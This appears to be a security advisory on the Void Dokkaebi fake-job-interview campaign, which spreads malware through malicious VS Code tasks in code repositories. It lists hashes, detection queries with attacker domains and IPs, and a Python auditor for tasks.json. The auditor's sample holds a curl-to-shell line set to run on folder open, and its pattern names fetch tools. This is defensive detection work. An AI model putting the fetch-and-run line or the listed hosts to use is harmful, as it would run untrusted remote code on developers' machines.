Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories

    Date: 04/22/2026

    Severity: High

    Summary

    Void Dokkaebi (Famous Chollima) has advanced from targeted social engineering into a self-spreading supply chain threat. Compromised developer repositories act as infection hubs, propagating malware across the developer ecosystem like a worm. It exploits trusted workflows using malicious VS Code tasks and injected code that runs during normal development. Infected code can spread further through open-source projects, exposing contributors, forks, and downstream users. By March 2026, over 750 repositories were affected, leveraging blockchain platforms for resilient payload delivery.
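
The summary describes malicious VS Code tasks that run during normal development. As an added example (not code from this advisory or the referenced report), the script below audits a repository's `.vscode/tasks.json` before the folder is opened in the editor. The two heuristics (auto-run on folder open, commands referencing remote content), the function names and the sample file are assumptions made for illustration.

```python
import json
import re

# Heuristic for commands that pull or run remote content (illustrative assumption,
# not an indicator from the advisory).
FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I)
# Matches string literals first so comment markers inside strings are left alone.
JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text):
    """tasks.json is JSON with comments: drop comments, keep string literals."""
    return JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

def audit_tasks(text):
    """Return [(task label, [reasons])] for tasks that need manual review."""
    try:
        doc = json.loads(strip_jsonc(text))
        tasks = doc.get("tasks", [])
    except (json.JSONDecodeError, AttributeError):
        return [("<file>", ["unparseable tasks.json"])]
    findings = []
    for task in tasks:
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically on folder open")
        # command/args can be overridden per OS, so check those variants too
        variants = [task] + [task.get(k, {}) for k in ("windows", "linux", "osx")]
        cmd = " ".join(f"{v.get('command', '')} {v.get('args', '')}" for v in variants)
        if FETCH.search(cmd):
            reasons.append("command references remote content")
        if reasons:
            findings.append((task.get("label", "<unlabelled>"), reasons))
    return findings

# Constructed sample, not taken from any real repository.
SAMPLE = """{
  // workspace tasks
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "prepare", "type": "shell",
     "command": "curl -s https://example.invalid/setup | sh",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

if __name__ == "__main__":
    for label, reasons in audit_tasks(SAMPLE):
        print(label, "->", "; ".join(reasons))
```

A file that fails to parse is reported rather than skipped, so it still reaches a reviewer.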

    Indicators of Compromise (IOC) List

    Domains/URLs :

    IP Address :

    Hash : 

    23e37cf4e2a7d55ed107b3bc3eb7812a0e3d8f90b23b0c8f549d5c10d089a2c8

    834a92277f1bd82d4d473ac0aa2ddb23208a3a8763a576b882e7326c42bc5412

    Wallet : 

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "chvsvr.short.gy" or url like "chvsvr.short.gy" or siteurl like "chvsvr.short.gy" or domainname like "default-configuration.vercel.app" or url like "default-configuration.vercel.app" or siteurl like "default-configuration.vercel.app" or domainname like "coreviewer.vercel.app" or url like "coreviewer.vercel.app" or siteurl like "coreviewer.vercel.app" or domainname like "tailwind-version-4.vercel.app" or url like "tailwind-version-4.vercel.app" or siteurl like "tailwind-version-4.vercel.app" or domainname like "vscode-extension-260120.vercel.app" or url like "vscode-extension-260120.vercel.app" or siteurl like "vscode-extension-260120.vercel.app" or domainname like "vscode-settings-config.vercel.app" or url like "vscode-settings-config.vercel.app" or siteurl like "vscode-settings-config.vercel.app" or domainname like "vscode-settings-bootstrap.vercel.app" or url like "vscode-settings-bootstrap.vercel.app" or siteurl like "vscode-settings-bootstrap.vercel.app" or domainname like "task-hrec.vercel.app" or url like "task-hrec.vercel.app" or siteurl like "task-hrec.vercel.app" or domainname like "regioncheck.xyz" or url like "regioncheck.xyz" or siteurl like "regioncheck.xyz" or domainname like "260120.vercel.app" or url like "260120.vercel.app" or siteurl like "260120.vercel.app" or domainname like "cgbrandh.short.gy" or url like "cgbrandh.short.gy" or siteurl like "cgbrandh.short.gy" or domainname like "vscode-ext-git.vercel.app" or url like "vscode-ext-git.vercel.app" or siteurl like "vscode-ext-git.vercel.app" or domainname like "vscode-toolkit-settings.vercel.app" or url like "vscode-toolkit-settings.vercel.app" or siteurl like "vscode-toolkit-settings.vercel.app" or domainname like "vscode-production-setting.vercel.app" or url like "vscode-production-setting.vercel.app" or siteurl like "vscode-production-setting.vercel.app" or domainname like "vscode-helper171.vercel.app" or url like "vscode-helper171.vercel.app" or siteurl like 
"vscode-helper171.vercel.app" or domainname like "vscode-helper171-ruby.vercel.app" or url like "vscode-helper171-ruby.vercel.app" or siteurl like "vscode-helper171-ruby.vercel.app" or domainname like "default-configuration-sandy.vercel.app" or url like "default-configuration-sandy.vercel.app" or siteurl like "default-configuration-sandy.vercel.app" or domainname like "vscode-config-setting.vercel.app" or url like "vscode-config-setting.vercel.app" or siteurl like "vscode-config-setting.vercel.app" or domainname like "codeviewer-three.vercel.app" or url like "codeviewer-three.vercel.app" or siteurl like "codeviewer-three.vercel.app" or domainname like "vscode-settings-config-md.vercel.app" or url like "vscode-settings-config-md.vercel.app" or siteurl like "vscode-settings-config-md.vercel.app" or domainname like "ext-checkedin.vercel.app" or url like "ext-checkedin.vercel.app" or siteurl like "ext-checkedin.vercel.app" or domainname like "data-kappa.vercel.app" or url like "data-kappa.vercel.app" or siteurl like "data-kappa.vercel.app" or domainname like "isvalid-regions.vercel.app" or url like "isvalid-regions.vercel.app" or siteurl like "isvalid-regions.vercel.app" or domainname like "PEsnCV.short.gy" or url like "PEsnCV.short.gy" or siteurl like "PEsnCV.short.gy" or domainname like "thopywork.vercel.app" or url like "thopywork.vercel.app" or siteurl like "thopywork.vercel.app" or domainname like "vscode-config-settings.vercel.app" or url like "vscode-config-settings.vercel.app" or siteurl like "vscode-config-settings.vercel.app" or domainname like "vscode-config.vercel.app" or url like "vscode-config.vercel.app" or siteurl like "vscode-config.vercel.app" or domainname like "vscode-bootstrapper.vercel.app" or url like "vscode-bootstrapper.vercel.app" or siteurl like "vscode-bootstrapper.vercel.app" or domainname like "vscode-extensions-bootstrap.vercel.app" or url like "vscode-extensions-bootstrap.vercel.app" or siteurl like 
"vscode-extensions-bootstrap.vercel.app" or domainname like "davhub88.vercel.app" or url like "davhub88.vercel.app" or siteurl like "davhub88.vercel.app" or domainname like "lackservice.short.gy" or url like "lackservice.short.gy" or siteurl like "lackservice.short.gy" or domainname like "gurucooldown.short.gy" or url like "gurucooldown.short.gy" or siteurl like "gurucooldown.short.gy"

    Detection Query 2 :

    dstipaddress IN ("198.105.127.210","136.0.9.8","23.27.20.143","23.27.202.27","23.27.120.142","85.239.62.36","166.88.4.2","154.91.0.196","83.168.68.219") or srcipaddress IN ("198.105.127.210","136.0.9.8","23.27.20.143","23.27.202.27","23.27.120.142","85.239.62.36","166.88.4.2","154.91.0.196","83.168.68.219")

    Detection Query 3 :

    sha256hash IN ("834a92277f1bd82d4d473ac0aa2ddb23208a3a8763a576b882e7326c42bc5412","23e37cf4e2a7d55ed107b3bc3eb7812a0e3d8f90b23b0c8f549d5c10d089a2c8")

    Reference:    

    https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html


    Tags

    Malware, Social Engineering, Exploit, Worm, Blockchain, GitHub
